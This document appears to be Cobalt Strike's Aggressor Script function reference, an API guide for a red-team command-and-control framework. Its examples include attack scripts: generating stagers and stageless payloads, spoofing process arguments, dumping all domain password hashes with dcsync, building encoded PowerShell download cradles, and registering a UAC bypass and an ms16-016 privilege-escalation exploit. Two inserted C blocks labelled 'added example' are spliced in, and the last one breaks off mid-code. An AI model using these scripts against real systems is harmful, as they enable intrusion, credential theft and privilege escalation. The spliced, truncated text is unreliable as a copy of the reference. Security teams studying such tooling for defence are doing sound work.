Functions

This is a list of Aggressor Script's functions.

-hasbootstraphint

Check if a byte array has the x86 or x64 bootstrap hint. Use this function to determine if it's safe to use an artifact that passes GetProcAddress/GetModuleHandleA pointers to this payload.

Arguments

$1 - byte array with a payload or shellcode.

See also

&payload_bootstrap_hint

-is64

Check if a session is on an x64 system or not (Beacon only).

Arguments

$1 - Beacon/Session ID

Example

command x64 {
   foreach $session (beacons()) {
      if (-is64 $session['id']) {
         println($session);
      }
   }
}

-isactive

Check if a session is active or not. A session is considered active if (a) it has not acknowledged an exit message AND (b) it is not disconnected from a parent Beacon.

Arguments

$1 - Beacon/Session ID

Example

command active {
   local('$bid');
   foreach $bid (beacon_ids()) {
      if (-isactive $bid) {
         println("$bid is active!");
      }
   }
}

-isadmin

Check if a session has admin rights

Arguments

$1 - Beacon/Session ID

Example

command admin_sessions {
   foreach $session (beacons()) {
      if (-isadmin $session['id']) {
         println($session);
      }
   }
}

-isbeacon

Check if a session is a Beacon or not.

Arguments

$1 - Beacon/Session ID

Example

command beacons {
   foreach $session (beacons()) {
      if (-isbeacon $session['id']) {
         println($session);
      }
   }
}

-isssh

Check if a session is an SSH session or not.

Arguments

$1 - Beacon/Session ID

Example

command ssh_sessions {
   foreach $session (beacons()) {
      if (-isssh $session['id']) {
         println($session);
      }
   }
}

action

Post a public action message to the event log. This is similar to the /me command.

Arguments

$1 - the message

Example

action("dances!");

addTab

Create a tab to display a GUI object.

Arguments

$1 - the title of the tab

$2 - a GUI object. A GUI object is one that is an instance of javax.swing.JComponent.

$3 - a tooltip to display when a user hovers over this tab.

Example

$label = [new javax.swing.JLabel: "Hello World"];
addTab("Hello!", $label, "this is an example");

addVisualization

Register a visualization with Cobalt Strike.

Arguments

$1 - the name of the visualization

$2 - a javax.swing.JComponent object

Example

$label = [new javax.swing.JLabel: "Hello World!"];
addVisualization("Hello World", $label);

See also

&showVisualization

add_to_clipboard

Add text to the clipboard, notify the user.

Arguments

$1 - the text to add to the clipboard

Example

add_to_clipboard("Paste me you fool!");

alias

Creates an alias command in the Beacon console

Arguments

$1 - the alias name to bind to

$2 - a callback function. Called when the user runs the alias. Arguments are: $0 = command run, $1 = beacon id, $2 = arguments.

Example

alias("foo", {
   btask($1, "foo!");
});

alias_clear

Removes an alias command (and restores the default functionality, if any existed).

Arguments

$1 - the alias name to remove

Example

alias_clear("foo");

all_payloads

Generates all of the stageless payloads (in x86 and x64) for all of the configured listeners. (also available in the UI menu under Payloads -> Windows Stageless Generate all Payloads)

Arguments

$1 - The folder path to create the payloads in.

$2 - A boolean value for whether the executable files should be signed.

$3 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Example

$folder = all_payloads("/tmp/payloads", 1, "None");
println("Payloads have been saved to $folder");

applications

Returns a list of application information in Cobalt Strike's data model. These applications are results from the System Profiler.

Returns

An array of dictionary objects with information about each application.

Example

printAll(applications());

archives

Returns a massive list of archived information about your activity from Cobalt Strike's data model. This information is leaned on heavily to reconstruct your activity timeline in Cobalt Strike's reports.

Returns

An array of dictionary objects with information about your team's activity.

Example

foreach $index => $entry (archives()) {
   println("\c3( $+ $index $+ )\o $entry");
}

artifact

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager instead.

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - deprecated; this parameter no longer has any meaning.

$4 - x86|x64 - the architecture of the generated stager

Type        Description
dll         an x86 DLL
dllx64      an x64 DLL
exe         a plain executable
powershell  a powershell script
python      a python script
svcexe      a service executable
vbscript    a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact("my listener", "exe");

$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

artifact_general

Generates a payload artifact from arbitrary shellcode.

Arguments

$1 - the shellcode

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload

Type        Description
dll         a DLL
exe         a plain executable
powershell  a powershell script
python      a python script
svcexe      a service executable

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload, this function will only populate the script with the architecture specified in $3.

artifact_payload

Generates a stageless payload artifact (exe, dll) from a Cobalt Strike listener name

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$5 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Type        Description
dll         a DLL
exe         a plain executable
powershell  a powershell script
python      a python script
raw         raw payload stage
svcexe      a service executable

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload, this function will only populate the script with the architecture specified in $3.

Example

$data = artifact_payload("my listener", "exe", "x86", "process", "Indirect");

artifact_sign

Sign an EXE or DLL file

Arguments

$1 - the contents of the EXE or DLL file to sign

Notes

  • This function requires that a code-signing certificate is specified in this server's Malleable C2 profile. If no code-signing certificate is configured, this function will return $1 with no changes.
  • DO NOT sign an executable or DLL twice. The library Cobalt Strike uses for code-signing will create an invalid (second) signature if the executable or DLL is already signed.

Returns

A scalar containing the signed artifact.

Example

# generate an artifact!
$data = artifact("my listener", "exe");

# sign it.
$data = artifact_sign($data);

# save it
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);
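The second note above warns that signing an already-signed file produces an invalid second signature. The following C program, an added example that is not part of the Cobalt Strike documentation, shows how to tell whether a PE image already carries an Authenticode signature before it is handed to artifact_sign: it reads the IMAGE_DIRECTORY_ENTRY_SECURITY entry (index 4) of the optional header's data directory, which is non-zero only when a WIN_CERTIFICATE table is attached. The sample headers it builds are constructed in memory for the demonstration and contain no code; pe_has_authenticode, build_sample_pe and classify_sample are the example's own names.

```c
/* Added example: check a PE image for an existing Authenticode signature
 * before passing it to artifact_sign(). The signature is referenced by the
 * IMAGE_DIRECTORY_ENTRY_SECURITY data directory (index 4): a non-zero
 * offset and size there mean a WIN_CERTIFICATE table is attached.
 * Plain C without <windows.h>, so it runs anywhere; the sample headers it
 * builds are constructed for the demo and hold no code. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PE_SIG_NOT_PE  -1   /* not a parsable PE image */
#define PE_SIG_ABSENT   0   /* security directory empty: safe to sign once */
#define PE_SIG_PRESENT  1   /* already signed: do not sign again */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

int pe_has_authenticode(const uint8_t *buf, size_t len) {
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return PE_SIG_NOT_PE;
    uint32_t e_lfanew = rd32(buf + 0x3c);
    /* need room for "PE\0\0", the 20-byte COFF header and the optional header magic */
    if (e_lfanew > len || len - e_lfanew < 26) return PE_SIG_NOT_PE;
    const uint8_t *nt = buf + e_lfanew;
    if (memcmp(nt, "PE\0\0", 4) != 0) return PE_SIG_NOT_PE;
    uint16_t opt_size = rd16(nt + 20);          /* COFF header: SizeOfOptionalHeader */
    const uint8_t *opt = nt + 24;
    size_t avail = len - (size_t)(opt - buf);   /* bytes left from the optional header on */
    size_t dd_off;                              /* start of the data directory array */
    switch (rd16(opt)) {
        case 0x10b: dd_off = 96;  break;        /* PE32 */
        case 0x20b: dd_off = 112; break;        /* PE32+ */
        default:    return PE_SIG_NOT_PE;
    }
    if (opt_size < dd_off || avail < dd_off) return PE_SIG_NOT_PE;
    uint32_t nrva = rd32(opt + dd_off - 4);     /* NumberOfRvaAndSizes precedes the array */
    if (nrva <= 4) return PE_SIG_ABSENT;        /* directory too short to hold entry 4 */
    size_t sec = dd_off + 4 * 8;                /* entry 4, 8 bytes per entry */
    if (opt_size < sec + 8 || avail < sec + 8) return PE_SIG_NOT_PE;
    uint32_t off = rd32(opt + sec), size = rd32(opt + sec + 4);
    /* a full check would also validate the WIN_CERTIFICATE table at (off, size) */
    return (off != 0 && size != 0) ? PE_SIG_PRESENT : PE_SIG_ABSENT;
}

/* Constructed sample: a bare PE32+ header (DOS stub, COFF header, optional
 * header, no sections) with or without a populated security directory. */
size_t build_sample_pe(uint8_t *out, size_t cap, int signed_image) {
    const size_t total = 0x40 + 4 + 20 + 240;
    if (cap < total) return 0;
    memset(out, 0, total);
    out[0] = 'M'; out[1] = 'Z';
    wr32(out + 0x3c, 0x40);                     /* e_lfanew */
    uint8_t *nt = out + 0x40;
    memcpy(nt, "PE\0\0", 4);
    wr16(nt + 4, 0x8664);                       /* Machine: x64 */
    wr16(nt + 20, 240);                         /* SizeOfOptionalHeader (PE32+) */
    uint8_t *opt = nt + 24;
    wr16(opt, 0x20b);                           /* PE32+ magic */
    wr32(opt + 108, 16);                        /* NumberOfRvaAndSizes */
    if (signed_image) {
        wr32(opt + 112 + 32, 0x600);            /* security dir: file offset of WIN_CERTIFICATE */
        wr32(opt + 112 + 36, 0x1000);           /* security dir: its size */
    }
    return total;
}

/* Builds a sample and classifies it; used by main() and the test. */
int classify_sample(int signed_image) {
    uint8_t buf[512];
    size_t n = build_sample_pe(buf, sizeof buf, signed_image);
    return n ? pe_has_authenticode(buf, n) : PE_SIG_NOT_PE;
}

int main(void) {
    printf("unsigned sample -> %d (expect 0)\n", classify_sample(0));
    printf("signed sample   -> %d (expect 1)\n", classify_sample(1));
    return 0;
}
```

In a script, read the artifact's bytes, run this check (or the equivalent PE parsing) and only call artifact_sign when the result is PE_SIG_ABSENT; stagers and stageless artifacts fresh from artifact_stager or artifact_payload are unsigned unless the profile's code-signing block has already been applied.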

artifact_stageless

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_payload instead.

Generates a stageless artifact (exe, dll) from a (local) Cobalt Strike listener

Arguments

$1 - the listener name (must be local to this team server)

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - proxy configuration string

$5 - callback function. This function is called when the artifact is ready. The $1 argument is the stageless content.

Type        Description
dll         an x86 DLL
dllx64      an x64 DLL
exe         a plain executable
powershell  a powershell script
python      a python script
raw         raw payload stage
svcexe      a service executable

Notes

  • This function provides the stageless artifact via a callback function. This is necessary because Cobalt Strike generates payload stages on the team server.
  • The proxy configuration string is the same string you would use with Payloads -> Windows Stageless Payload. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:password@host:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior. Custom dialogs may use &drow_proxyserver to set this.
  • This function cannot generate artifacts for listeners on other team servers. This function also cannot generate artifacts for foreign listeners. Limit your use of this function to local listeners with stages only. Custom dialogs may use &drow_listener_stage to choose an acceptable listener for this function.
  • While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload, this function will only populate the script with the architecture specified in $3.

Example

sub ready {
   local('$handle');
   $handle = openf(">out.exe");
   writeb($handle, $1);
   closef($handle);
}

artifact_stageless("my listener", "exe", "x86", "", &ready);

artifact_stager

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated stager

Type        Description
dll         a DLL
exe         a plain executable
powershell  a powershell script
python      a python script
raw         the raw file
svcexe      a service executable
vbscript    a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact_stager("my listener", "exe", "x86");
 
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

barch

Returns the architecture of your Beacon session (e.g., x86 or x64)

Arguments

$1 - the id for the beacon to pull metadata for

Note

If the architecture is unknown (e.g., a DNS Beacon that hasn't sent metadata yet), this function returns x86.

Example

println("Arch is: " . barch($1));

bargue_add

This function adds an option to Beacon's list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

$3 - the fake arguments to use when the specified command is run.

Notes

  • The process match is exact. If Beacon tries to launch "net.exe", it will not match net, NET.EXE, or c:\windows\system32\net.exe. It will only match net.exe.
  • x86 Beacon can only spoof arguments in x86 child processes. Likewise, x64 Beacon can only spoof arguments in x64 child processes.
  • The real arguments are written to the memory space that holds the fake arguments. If the real arguments are longer than the fake arguments, the command launch will fail.

Example

# spoof cmd.exe arguments.
bargue_add($1, "%COMSPEC%", "/K \"cd c:\windows\temp & startupdatenow.bat\"");

# spoof net arguments
bargue_add($1, "net", "user guest /active:no");

bargue_list

List the commands + fake arguments Beacon will spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bargue_list($1);

bargue_remove

This function removes an option to Beacon's list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

Example

# don't spoof cmd.exe
bargue_remove($1, "%COMSPEC%");

base64_decode

Unwrap a base64-encoded string

Arguments

$1 - the string to decode

Returns

The argument processed by a base64 decoder

Example

println(base64_decode(base64_encode("this is a test")));

base64_encode

Base64 encode a string

Arguments

$1 - the string to encode

Returns

The argument processed by a base64 encoder

Example

println(base64_encode("this is a test"));

bblockdlls

Launch child processes with a binary signature policy that blocks non-Microsoft DLLs from loading into the process space.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - true or false; block non-Microsoft DLLs in child process

Note

This attribute is available in Windows 10 only.

Example

on beacon_initial {
   binput($1, "blockdlls start");
   bblockdlls($1, true);
}

bbrowser

Generate the beacon browser GUI component. Shows only Beacons.

Returns

The beacon browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Beacon Browser", bbrowser());

See also

&showVisualization

bbrowserpivot

Start a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the browser pivot agent into.

$3 - the architecture of the target PID (x86|x64)

Example

bbrowserpivot($1, 1234, "x86");

bbrowserpivot_stop

Stop a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bbrowserpivot_stop($1);

bbypassuac

REMOVED Removed in Cobalt Strike 4.0.

bcancel

Cancel a file download

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to cancel or a wildcard.

Example

item "&Cancel Downloads" {
   bcancel($1, "*");
}

bcd

Ask a Beacon to change its current working directory.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to change to.

Example

# create a command to change to the user's home directory
alias home {
   $home = "c:\\users\\" . binfo($1, "user");
   bcd($1, $home);
}

bcheckin

Ask a Beacon to checkin. This is basically a no-op for Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Checkin" {
   binput($1, "checkin");
   bcheckin($1);
}

bclear

This is the "oops" command. It clears the queued tasks for the specified beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bclear($1);

bconnect

Ask Beacon (or SSH session) to connect to a Beacon peer over a TCP socket

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to connect to

$3 - [optional] the port to use. Default profile port is used otherwise.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

bconnect($1, "DC");

bcovertvpn

Ask Beacon to deploy a Covert VPN client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the Covert VPN interface to deploy

$3 - the IP address of the interface [on target] to bridge into

$4 - [optional] the MAC address of the Covert VPN interface

Example

bcovertvpn($1, "phear0", "172.16.48.18");

bcp

Ask Beacon to copy a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to copy

$3 - the destination

Example

bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");

bdata

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(bdata("1234"));

bdcsync

Use mimikatz's dcsync command to pull a user's password hash from a domain controller. This function requires a domain administrator trust relationship.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - fully qualified name of the domain

$3 - DOMAIN\user to pull hashes for (optional)

$4 - the PID to inject the dcsync command into or $null

$5 - the architecture of the target PID (x86|x64) or $null

Note

If $3 is left out, dcsync will dump all domain hashes.

Examples

Spawn a temporary process:

# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab");

Inject into the specified process:

# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator", 1234, "x64");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64");

bdesktop

Start a VNC session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Desktop (VNC)" {
   bdesktop($1); 
}

bdllinject

Inject a Reflective DLL into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the DLL into

$3 - the local path to the Reflective DLL

Example

bdllinject($1, 1234, script_resource("test.dll"));

bdllload

Call LoadLibrary() in a remote process with the specified DLL.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target process PID

$3 - the on-target path to a DLL

Note

The DLL must be the same architecture as the target process.

Example

bdllload($1, 1234, "c:\\windows\\mystuff.dll");

bdllspawn

Spawn a Reflective DLL as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the Reflective DLL

$3 - a parameter to pass to the DLL

$4 - a short description of this post exploitation job (shows up in jobs output)

$5 - how long to block and wait for output (specified in milliseconds)

$6 - true/false; use impersonated token when running this post-ex job?

Notes

  • This function will spawn an x86 process if the Reflective DLL is an x86 DLL. Likewise, if the Reflective DLL is an x64 DLL, this function will spawn an x64 process.
  • A well-behaved Reflective DLL follows these rules:
    • Receives a parameter via the reserved DllMain parameter when the DLL_PROCESS_ATTACH reason is specified.
    • Prints messages to STDOUT
    • Calls fflush(stdout) to flush STDOUT
    • Calls ExitProcess(0) when done. This kills the spawned process to host the capability.

Example (ReflectiveDll.c)

This example is based on Stephen Fewer's Reflective DLL Injection Project:

#include <windows.h>
#include <stdio.h>
#include "ReflectiveLoader.h"   /* from the Reflective DLL Injection project; defines DLL_QUERY_HMODULE */

/* set by the reflective loader so the DLL can report its own module handle */
extern HINSTANCE hAppInstance;

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
   BOOL bReturnValue = TRUE;
   switch( dwReason ) {
      case DLL_QUERY_HMODULE:
         if( lpReserved != NULL )
            *(HMODULE *)lpReserved = hAppInstance;
         break;
      case DLL_PROCESS_ATTACH:
         hAppInstance = hinstDLL;

         /* print some output to the operator; lpReserved carries the bdllspawn parameter */
         if (lpReserved != NULL) {
            printf("Hello from test.dll. Parameter is '%s'\n", (char *)lpReserved);
         }
         else {
            printf("Hello from test.dll. There is no parameter\n");
         }

         /* flush STDOUT so Beacon captures the output */
         fflush(stdout);

         /* we're done, so let's exit the spawned host process */
         ExitProcess(0);
         break;
      case DLL_PROCESS_DETACH:
      case DLL_THREAD_ATTACH:
      case DLL_THREAD_DETACH:
         break;
   }
   return bReturnValue;
}

Example (Aggressor Script)

alias hello {
   bdllspawn($1, script_resource("reflective_dll.dll"), $2, "test dll", 5000, false);
}

bdownload

Ask a Beacon to download a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to request

Example

bdownload($1, "c:\\sysprep.inf");

bdrives

Ask Beacon to list the drives on the compromised system

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Drives" {
   binput($1, "drives");
   bdrives($1);
}

beacon_command_describe

Describe a Beacon command.

Returns

A string description of the Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_describe("ls"));

beacon_command_detail

Get the help information for a Beacon command.

Returns

A string with helpful information about a Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_detail("ls"));

beacon_command_register

Register help information for a Beacon command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

alias echo {
   # $0 is the full command line; skip the leading "echo " to get the text
   blog($1, "You typed: " . substr($0, 5));
}

beacon_command_register(
   "echo", 
   "echo text to beacon log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the beacon console");

beacon_commands

Get a list of Beacon commands.

Returns

An array of Beacon commands.

Example

printAll(beacon_commands());

beacon_data

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(beacon_data("1234"));

beacon_elevator_describe

Describe a Beacon command elevator exploit

Returns

A string description of the Beacon command elevator

Arguments

$1 - the exploit

Example

println(beacon_elevator_describe("uac-token-duplication"));

See Also

&beacon_elevator_register, &beacon_elevators, &belevate_command

beacon_elevator_register

Register a Beacon command elevator with Cobalt Strike. This adds an option to the runasadmin command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 the command and arguments)

Example

# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub schtasks_elevator {
   local('$handle $script $oneliner $command');

   # acknowledge this command
   btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");

   # read in the script
   $handle = openf(getFileProper(script_resource("modules"), "Invoke-EnvBypass.ps1"));
   $script = readb($handle, -1);
   closef($handle);

   # host the script in Beacon
   $oneliner = beacon_host_script($1, $script);

   # base64 encode the command
   $command  = transform($2, "powershell-base64");

   # run the specified command via this exploit.
   bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"", $oneliner);
}

beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_elevator);

See Also

&beacon_elevator_describe, &beacon_elevators, &belevate_command

beacon_elevators

Get a list of command elevator exploits registered with Cobalt Strike.

Returns

An array of Beacon command elevators

Example

printAll(beacon_elevators());

See also

&beacon_elevator_describe, &beacon_elevator_register, &belevate_command

beacon_execute_job

Run a command and report its output to the user.

Arguments

$1 - the Beacon ID

$2 - the command to run (environment variables are resolved)

$3 - the command arguments (environment variables are not resolved).

$4 - flags that change how the job is launched (e.g., 1 = disable WOW64 file system redirection)

Notes

  • The strings $2 and $3 are concatenated as-is into a command line. Make sure $3 begins with a space!
  • This is the mechanism Cobalt Strike uses for its shell and powershell commands.

Example

alias shell {
   local('$args');
   $args = substr($0, 6);
   btask($1, "Tasked beacon to run: $args", "T1059");
   beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
}

beacon_exploit_describe

Describe a Beacon exploit

Returns

A string description of the Beacon exploit

Arguments

$1 - the exploit

Example

println(beacon_exploit_describe("ms14-058"));
See Also

&beacon_exploit_register, &beacon_exploits, &belevate

beacon_exploit_register

Register a Beacon privilege escalation exploit with Cobalt Strike. This adds an option to the elevate command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the listener)

Example

# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb

sub ms16_016_exploit {
   local('$stager');
   
   # check if we're on an x64 system and error out.
   if (-is64 $1) {
      berror($1, "ms16-016 exploit is x86 only");
      return;
   }

   # acknowledge this command
   btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");

   # generate our shellcode
   $stager = payload($2, "x86");

   # spawn a Beacon post-ex job with the exploit DLL
   bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

   # link to our payload if it's a TCP or SMB Beacon
   beacon_link($1, $null, $2);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);
See Also

&beacon_exploit_describe, &beacon_exploits, &belevate

beacon_exploits

Get a list of privilege escalation exploits registered with Cobalt Strike.

Returns

An array of Beacon exploits.

Example

printAll(beacon_exploits());

See also

&beacon_exploit_describe, &beacon_exploit_register, &belevate

beacon_host_imported_script

Locally host a previously imported PowerShell script within Beacon and return a short script that will download and invoke this script.

Arguments

$1 - the id of the Beacon to host this script with.

Returns

A short PowerShell script that downloads and evaluates the previously imported script when run. How this one-liner is used is up to you!

Example

alias powershell {
   local('$args $cradle $runme $cmd');
   
   # $0 is the entire command with no parsing.
   $args   = substr($0, 11);
   
   # generate the download cradle (if one exists) for an imported PowerShell script
   $cradle = beacon_host_imported_script($1);
   
   # encode our download cradle AND cmdlet+args we want to run
   $runme  = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
   
   # Build up our entire command line.
   $cmd    = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
   
   # task Beacon to run all of this.
   btask($1, "Tasked beacon to run: $args", "T1086");
   beacon_execute_job($1, "powershell", $cmd, 1);
}

beacon_host_script

Locally host a PowerShell script within Beacon and return a short script that will download and invoke this script. This function is a way to run large scripts when there are constraints on the length of your PowerShell one-liner.

Arguments

$1 - the id of the Beacon to host this script with.

$2 - the script data to host.

Returns

A short PowerShell script to download and evaluate the script when run. How this one-liner is used is up to you!

Example

alias test {
   local('$script $hosted');
   $script = "2 + 2";
   $hosted = beacon_host_script($1, $script);
   
   binput($1, "powerpick $hosted");
   bpowerpick($1, $hosted);
}

beacon_ids

Get the ID of all Beacons calling back to this Cobalt Strike team server.

Returns

An array of beacon IDs

Example

foreach $bid (beacon_ids()) {
   println("Bid: $bid");
}

beacon_info

Get information from a Beacon session's metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . beacon_info("1234", "user"));
println("PID  is: " . beacon_info("1234", "pid"));

beacon_inline_execute

Execute a Beacon Object File

Arguments

$1 - the id for the Beacon

$2 - a string containing the BOF file

$3 - the entry point to call

$4 - packed arguments to pass to the BOF file

Note

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

Example (hello.c)

/*
* Compile with:
* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
*/

#include "windows.h"
#include "stdio.h"
#include "tlhelp32.h"
#include "beacon.h"

void demo(char * args, int length) {
   datap  parser;
   char * str_arg;
   int    num_arg;
   
   BeaconDataParse(&parser, args, length);
   str_arg = BeaconDataExtract(&parser, NULL);
   num_arg = BeaconDataInt(&parser);
   
   BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
}

Example (hello.cna)

alias hello {
   local('$barch $handle $data $args');

   # figure out the arch of this session
   $barch  = barch($1);

   # read in the right BOF file
   $handle = openf(script_resource("hello. $+ $barch $+ .o"));
   $data   = readb($handle, -1);
   closef($handle);

   # pack our arguments
   $args   = bof_pack($1, "zi", "Hello World", 1234);

   # announce what we're doing
   btask($1, "Running Hello BOF");
   
   # execute it.
   beacon_inline_execute($1, $data, "demo", $args);
}

See Also

&bof_pack
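To see how the arguments that hello.cna packs with bof_pack($1, "zi", ...) reach demo() in hello.c, here is an added C harness that is not part of the Cobalt Strike documentation or its beacon.h. It stands in for BeaconDataParse, BeaconDataExtract, BeaconDataInt and BeaconPrintf so demo() can run on a developer machine with no Beacon, and it is equally useful for decoding a captured packed-argument buffer. The wire layout it assumes, a 4-byte little-endian total length, then a 4-byte length-prefixed NUL-terminated string, then a 4-byte int, follows the public beacon.h and open-source BOF loaders; pack_zi, run_demo and last_beacon_output are the harness's own names.

```c
/* Added harness (not from Cobalt Strike): offline stand-ins for the Beacon
 * data API used by hello.c, plus a packer for the "zi" argument layout.
 * Assumed layout (little-endian): [u32 total][u32 slen][string\0][i32 n]. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#include <stdarg.h>

typedef struct {
    char *original;  /* start of the buffer */
    char *buffer;    /* current read position */
    int   length;    /* bytes remaining */
    int   size;      /* total payload size */
} datap;

#define CALLBACK_OUTPUT 0x0

void BeaconDataParse(datap *parser, char *buffer, int size) {
    parser->original = buffer;
    parser->buffer   = buffer + 4;      /* skip the leading total-length field */
    parser->length   = size - 4;
    parser->size     = size - 4;
}

int BeaconDataInt(datap *parser) {
    int32_t v = 0;
    if (parser->length < 4) return 0;   /* under-read: return 0 rather than read past the end */
    memcpy(&v, parser->buffer, 4);
    parser->buffer += 4; parser->length -= 4;
    return v;
}

char *BeaconDataExtract(datap *parser, int *size) {
    uint32_t len = 0;
    if (parser->length < 4) return NULL;
    memcpy(&len, parser->buffer, 4);
    if ((int)len > parser->length - 4) return NULL;   /* length claims more than remains */
    parser->buffer += 4; parser->length -= 4;
    char *out = parser->buffer;
    parser->buffer += len; parser->length -= (int)len;
    if (size) *size = (int)len;
    return out;
}

/* Stand-in for BeaconPrintf: captures the formatted text so a test can read it. */
static char g_last_output[256];
void BeaconPrintf(int type, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(g_last_output, sizeof g_last_output, fmt, ap);
    va_end(ap);
    (void)type;
}
const char *last_beacon_output(void) { return g_last_output; }

/* Packs a (string, int) pair as bof_pack($1, "zi", ...) would. Returns the byte count. */
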